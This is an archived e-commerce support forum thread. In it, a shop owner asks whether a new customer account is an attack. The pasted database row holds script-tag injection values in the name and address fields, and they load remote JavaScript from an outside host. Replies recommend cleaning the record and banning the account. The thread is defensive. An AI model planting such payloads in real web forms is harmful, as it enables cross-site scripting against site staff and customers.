Jump to content

Archived

This topic is now archived and is closed to further replies.

greasemonkey

Do I need to worry about this?

Recommended Posts

Using 2.3.4 BS

 

And I've had a customer just create an account with the following details.... looks like someone is trying to inject something?

 

 

23311;"18636";NULL;"""__script src=//xss.tv/lkvzyF__/script_";"Linda";"Juan""__script src=//xss.tv/lkvzyF__/script_";"24 Cyprus""__script src=//xss.tv/lkvzyF__/script_";;"T1P 1N1";"Hiram""__script src=http://xss.tv/lkvzyF__/script_";;"38";"66"

 

Share this post


Link to post
Share on other sites

It certainly looks like they're trying to do something nasty. Even if this isn't successful against an osC installation, I would still (at a minimum) manually edit their account information to remove the suspicious stuff. If it comes back, delete their account and IP ban them.

Share this post


Link to post
Share on other sites

@@MrPhil thank for the advice - I've done that.

 

And crossed my fingers....

 

I presumed this type of attack would not be successful .... But when it's such a blatant attempt I get kinda scared.

 

Maybe the custom has a virus that is trying to do the injection? Or maybe from a public wifi? The customer seems legit.

Share this post


Link to post
Share on other sites

If you think it might be accidental because their PC has been zombified, perhaps they'd appreciate a "heads up" notice that their PC may be sick. On the other hand, if they're deliberately trying to "get" you, they now know that you watch for such things and are on alert (and thus not a good target for further attempts).

Share this post


Link to post
Share on other sites

×